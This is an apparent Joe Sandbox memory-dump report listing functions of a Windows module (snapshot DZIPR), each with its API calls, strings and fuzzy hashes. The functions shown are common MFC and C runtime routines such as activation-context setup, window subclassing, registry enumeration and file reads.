Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-2424895508
Opcode ID: 548eabe8984a07c2540f57b586cc671e069445f8f22ba545c804ec554d57449d
Instruction ID: d5913e3a6b7ba1ee850af37894cf194872838851b6df704bfd3e98bd16abf267
Opcode Fuzzy Hash: 548eabe8984a07c2540f57b586cc671e069445f8f22ba545c804ec554d57449d
Instruction Fuzzy Hash: 95117BB1C0D691AFCF10EFA59989446BFB5AB87339325043FF5198B710D7315650CB22

Function 6FEAA59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32,6FEAA6B6), ref: 6FEAA5AA
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FEAA5CB
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FEAA5DD
GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FEAA5EF
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FEAA601

Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4

Strings

ActivateActCtx, xrefs: 6FEAA5DF
DeactivateActCtx, xrefs: 6FEAA5F1
CreateActCtxW, xrefs: 6FEAA5C5
ReleaseActCtx, xrefs: 6FEAA5CD
KERNEL32, xrefs: 6FEAA5A5

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 417325364-2424895508
Opcode ID: 3b6cabdf337741ddb7b1d40d4fa33ce2255d5c84f6e0fb5c67bcafe9051e47b1
Instruction ID: eefc99a7ea94dd21f033c97851439fb59b5085b7bd279d9509f788ddeca3fa24
Opcode Fuzzy Hash: 3b6cabdf337741ddb7b1d40d4fa33ce2255d5c84f6e0fb5c67bcafe9051e47b1
Instruction Fuzzy Hash: 76F01C70C0DB35AFCF415FB5AE099067FACAB87379710442BB81492614D7718528CF42

Function 6FEAC8E2 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FEAC91F
PathFindExtensionW.SHLWAPI(?), ref: 6FEAC939
__wcsdup.LIBCMT ref: 6FEAC983
__wcsdup.LIBCMT ref: 6FEAC9C2
__wcsdup.LIBCMT ref: 6FEACA14
__wcsdup.LIBCMT ref: 6FEACA55

Strings

.HLP, xrefs: 6FEAC9F9
.INI, xrefs: 6FEACA36
.CHM, xrefs: 6FEAC9F2

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: __wcsdup$ExtensionFileFindModuleNamePath
String ID: .CHM$.HLP$.INI
API String ID: 2477486372-4017452060
Opcode ID: 3fe38ddd3d60e2ffa3c569d1c8520ff6087cb0518042381aeac53ba00f1fb0c2
Instruction ID: 8b30e3de6475e77c80a3b8ceb5c69e7ebb1b6d69350b12fd41d8a942ea61187f
Opcode Fuzzy Hash: 3fe38ddd3d60e2ffa3c569d1c8520ff6087cb0518042381aeac53ba00f1fb0c2
Instruction Fuzzy Hash: A341B3B1A007099FDB20DB78CD44A9ABFFDAF45308F2004AED556DB290EB32E944CB51

Function 6FEB1861 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FEB1868
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FEB1877
CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FEB18D1

Part of subcall function 6FEB0C2C: GetWindowRect.USER32(?,10000000), ref: 6FEB0C56

SetWindowLongW.USER32(?,000000FC,?), ref: 6FEB18F8
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FEB1900
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FEB1907
GlobalDeleteAtom.KERNEL32(?), ref: 6FEB1911
CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FEB1965

Strings

AfxOldWndProc423, xrefs: 6FEB1870, 6FEB1875, 6FEB18FE, 6FEB1906

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: ee1c639d9bcb67c4e9c20e7df5eeb46c7e6203eaf64ff2f77003962da44dfa8d
Instruction ID: 9379fa8b3ea69ae5fdb6b971fa72edc8d0bd3c5607d1d5ece064ae5a99a23c89
Opcode Fuzzy Hash: ee1c639d9bcb67c4e9c20e7df5eeb46c7e6203eaf64ff2f77003962da44dfa8d
Instruction Fuzzy Hash: 8F31703240425AABCF019FE4CF49DFF7E79AF46325F20052DF611A6190C7399A21DBA1

Function 6FEA1C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FEA1BE9,?,?,?,?), ref: 6FEA1C39
GetLastError.KERNEL32(?,?,?,?,?,6FEA1BE9,?,?,?,?), ref: 6FEA1C48
__aullrem.LIBCMT ref: 6FEA1C60
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FEA1CE8
_memset.LIBCMT ref: 6FEA1CF5
SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FEA1BE9,?,?,?,?), ref: 6FEA1D07

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: File$Pointer$ErrorLastRead__aullrem_memset
String ID:
API String ID: 123228641-0
Opcode ID: 060229d79050c066b4d46301204deba53900ac6c9519900ffe4ca0bccc685925
Instruction ID: cab8c6122ae3524d3f3e078402c37b4c8d7eed7aa3cd2e524b549cf3a0999f64
Opcode Fuzzy Hash: 060229d79050c066b4d46301204deba53900ac6c9519900ffe4ca0bccc685925
Instruction Fuzzy Hash: 45516171608711AFD740DF69C844B9BBBE8EF88764F10492DF968DB340E775E9048BA2

Function 6FEABE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FEABE14
RtlEnterCriticalSection.NTDLL(00000000), ref: 6FEABE25
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?,?,?,?), ref: 6FEABE43
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABE77
RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABEE3
_memset.LIBCMT ref: 6FEABF02
TlsSetValue.KERNEL32(?,00000000), ref: 6FEABF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABF34

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 129a8ac89bedd4292fcec1cc816d15464437964e4656b3038e515300d03c6e12
Instruction ID: b816380d9123aa9b001354619aa4df0094a2b5dcfe49ec36d51b9cb81ba97d9c
Opcode Fuzzy Hash: 129a8ac89bedd4292fcec1cc816d15464437964e4656b3038e515300d03c6e12
Instruction Fuzzy Hash: F4315D74904609EFDB109F24CD8585ABFB5FF06324B30C52EE6659A694CB32A950CF90

Function 6FEA81FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FEA815A: GetParent.USER32(?), ref: 6FEA81AE
Part of subcall function 6FEA815A: GetLastActivePopup.USER32(?), ref: 6FEA81BF
Part of subcall function 6FEA815A: IsWindowEnabled.USER32(?), ref: 6FEA81D3
Part of subcall function 6FEA815A: EnableWindow.USER32(?,00000000), ref: 6FEA81E6

EnableWindow.USER32(?,00000001), ref: 6FEA8247
GetWindowThreadProcessId.USER32(?,?), ref: 6FEA825B
GetCurrentProcessId.KERNEL32(?,?), ref: 6FEA8265
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FEA827D
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FEA82F9
EnableWindow.USER32(00000000,00000001), ref: 6FEA8340

Strings

8mo, xrefs: 6FEA81FC

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 8mo
API String ID: 1877664794-4096906208
Opcode ID: 23bb819fb8e9190f62548e9bf88f8c7a43ca69fba5ce639331d2667d909be4f8
Instruction ID: 8887d69f6333ffd815ff1134b0a6f78cb8a48a6e41a2b0ae90d684a2b1038126
Opcode Fuzzy Hash: 23bb819fb8e9190f62548e9bf88f8c7a43ca69fba5ce639331d2667d909be4f8
Instruction Fuzzy Hash: 8F41D531A04B589BDB108F64CD887EA7FB4FF45314F200599E524DA284D771EF508BA0

Function 6FEADE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FEADED6
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FEADF00
GetSystemMetrics.USER32(00000000), ref: 6FEADF17
GetSystemMetrics.USER32(00000001), ref: 6FEADF1E
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FEADF49

Strings

B, xrefs: 6FEADEE0
DISPLAY, xrefs: 6FEADF40

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
Opcode ID: 94594cb07485c052c64b05a55d4a5e490e7d6d3d10fbdd943818f4d6cff89b1f
Instruction ID: 170ee61b191453d6bac06a0a536f162f87df3fc88f71908c5668a9110b31e9fd
Opcode Fuzzy Hash: 94594cb07485c052c64b05a55d4a5e490e7d6d3d10fbdd943818f4d6cff89b1f
Instruction Fuzzy Hash: 2C21CB79504720ABDF208F248C44B5B7FAAFF46764F214176FD289F284D6B1D541CBA1

Function 6FEACD66 Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6FEACD75
GetSystemMetrics.USER32(0000000C), ref: 6FEACD7C
GetSystemMetrics.USER32(00000002), ref: 6FEACD83
GetSystemMetrics.USER32(00000003), ref: 6FEACD8D
GetDC.USER32(00000000), ref: 6FEACD97
GetDeviceCaps.GDI32(00000000,00000058), ref: 6FEACDA8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FEACDB0
ReleaseDC.USER32(00000000,00000000), ref: 6FEACDB8

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 5aac92f3e937b0023238ae7c9222d6a78d17832c2e582e0dffe35d658ac06a81
Instruction ID: eda123522eb1c6b13b8010e69af7d8cc25db66ebd35b625e496d2ba5d92b1987
Opcode Fuzzy Hash: 5aac92f3e937b0023238ae7c9222d6a78d17832c2e582e0dffe35d658ac06a81
Instruction Fuzzy Hash: 47F06DB1E40B28BAEB105B728C4AF167F68EB42731F004567F6148B2C0CAB598208FD0

Function 6FEB020C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FEB029B
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FEB02C4
GetWindowLongW.USER32(?,000000FC), ref: 6FEB02D6
GetWindowLongW.USER32(?,000000FC), ref: 6FEB02E7
SetWindowLongW.USER32(?,000000FC,?), ref: 6FEB0303

Strings

,, xrefs: 6FEB02BA

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 9f725cb41df36a18098735d057b5a5b75cedfd6d59475dbe473dcdb0b24d72b6
Instruction ID: c342cf27d199718ab9e906dbb36ab5739fadda93d705402692abb0b4dbfb8d99
Opcode Fuzzy Hash: 9f725cb41df36a18098735d057b5a5b75cedfd6d59475dbe473dcdb0b24d72b6
Instruction Fuzzy Hash: 9631A0316007109FDB109FB8CA84A5DBFF5BF89328F20166DE6569B691EB31F404CB54

Function 6FEAA200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FEAA20A
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FEAA2F0
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FEAA30D
RegCloseKey.ADVAPI32(?), ref: 6FEAA32D
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FEAA348

Strings

Software\, xrefs: 6FEAA26E

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 382c0eb9e6b49433e8282e06d56987f49af73cf3d244ba63e35f93558c34b435
Instruction ID: caefdeae8b7919eccfda31ca18c49636fc9faca00a324f6883b3fcfd0ac22e5c
Opcode Fuzzy Hash: 382c0eb9e6b49433e8282e06d56987f49af73cf3d244ba63e35f93558c34b435
Instruction Fuzzy Hash: FA41B531840618EBCB21DBA4DD88EDEBFB9AF49714F2002D9F015E6190DB369B94CF50

Function 6FEAA082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6FEAA08C
RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FEAA11A
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FEAA13D

Part of subcall function 6FEAA02D: __EH_prolog3.LIBCMT ref: 6FEAA034

Strings

Software\Classes\, xrefs: 6FEAA0CD

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 433733f69c420ec4ab2b8f09443296d263a94e64c5803b522813518b906fe1d3
Instruction ID: 1b2dee1beac06a0f38d3bae99322e750f9bdae0f27d13a5c6393d67bb146c417
Opcode Fuzzy Hash: 433733f69c420ec4ab2b8f09443296d263a94e64c5803b522813518b906fe1d3
Instruction Fuzzy Hash: 9B318271C44228FACB229BE4DD48BDDBFB5AF19324F2402DAE8596B290C7315F849F51

Function 6FEAD07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FEAD0AE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FEAD0D1
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FEAD0ED
RegCloseKey.ADVAPI32(?), ref: 6FEAD0FD
RegCloseKey.ADVAPI32(?), ref: 6FEAD107

Strings

software, xrefs: 6FEAD096

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 27803853be5e3eedf599c90054f432781176de7332d2393c5b0ccd08c37b44f6
Instruction ID: becbfe6dc1011b1bf0a68231f640dc229d62a56e9c2cf589a5778eba40f535ce
Opcode Fuzzy Hash: 27803853be5e3eedf599c90054f432781176de7332d2393c5b0ccd08c37b44f6
Instruction Fuzzy Hash: D7112B76D00118BBCB21DA9ACD88CDFBFBEEFCA714F2100AAF514A2111D7319A10DB60

Function 6FEABEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABEB5
__CxxThrowException@8.LIBCMT ref: 6FEABEBF

Part of subcall function 6FEB527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6FEB52BD

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABED6
RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABEE3

Part of subcall function 6FEA6D89: __CxxThrowException@8.LIBCMT ref: 6FEA6D9F

_memset.LIBCMT ref: 6FEABF02
TlsSetValue.KERNEL32(?,00000000), ref: 6FEABF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABF34

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 54c51830d44b06f6bf8d0c9e3d25659fe3dba126ac1fb85ecd788d6000e6e75d
Instruction ID: 2550cdaf3c1d093da0e84b74fcb48b4ecb604bf77b77369200a6ee010a6de9fd
Opcode Fuzzy Hash: 54c51830d44b06f6bf8d0c9e3d25659fe3dba126ac1fb85ecd788d6000e6e75d
Instruction Fuzzy Hash: EB118E74500609AFDB11AF68CD85C2ABFB9FF42324B20C53EF6659A664CB31AD60CF50

Function 6FEBFE0E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FEBFE1A

Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F

__amsg_exit.LIBCMT ref: 6FEBFE3A
__lock.LIBCMT ref: 6FEBFE4A
InterlockedDecrement.KERNEL32(?), ref: 6FEBFE67
InterlockedIncrement.KERNEL32(00E31610), ref: 6FEBFE92

Strings

$o, xrefs: 6FEBFE71

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: $o
API String ID: 4271482742-1314351406
Opcode ID: c14e630f1bb7baf8bb8c25cba7a976b5037ac60f7aec3dbc43a2cedc872c4fe9
Instruction ID: c8164e1d0f5e7a6bc1a055c4040517a4dd96ed525a13f661ee7b2aaf7b1a01cb
Opcode Fuzzy Hash: c14e630f1bb7baf8bb8c25cba7a976b5037ac60f7aec3dbc43a2cedc872c4fe9
Instruction Fuzzy Hash: 1501A13A901B619BDF119BA88F047AE7FA0AF46738F20010EE81067691C738B952CBD5

Function 6FEACA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 6FEACA85
SetErrorMode.KERNEL32(00000000), ref: 6FEACA8D

Part of subcall function 6FEAA698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FEAA6D0
Part of subcall function 6FEAA698: SetLastError.KERNEL32(0000006F), ref: 6FEAA6E7

GetModuleHandleW.KERNEL32(user32.dll), ref: 6FEACADC
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FEACAEC

Part of subcall function 6FEAC8E2: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FEAC91F
Part of subcall function 6FEAC8E2: PathFindExtensionW.SHLWAPI(?), ref: 6FEAC939
Part of subcall function 6FEAC8E2: __wcsdup.LIBCMT ref: 6FEAC983
Part of subcall function 6FEAC8E2: __wcsdup.LIBCMT ref: 6FEAC9C2
Part of subcall function 6FEAC8E2: __wcsdup.LIBCMT ref: 6FEACA14

Strings

NotifyWinEvent, xrefs: 6FEACAE6
user32.dll, xrefs: 6FEACAD7

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

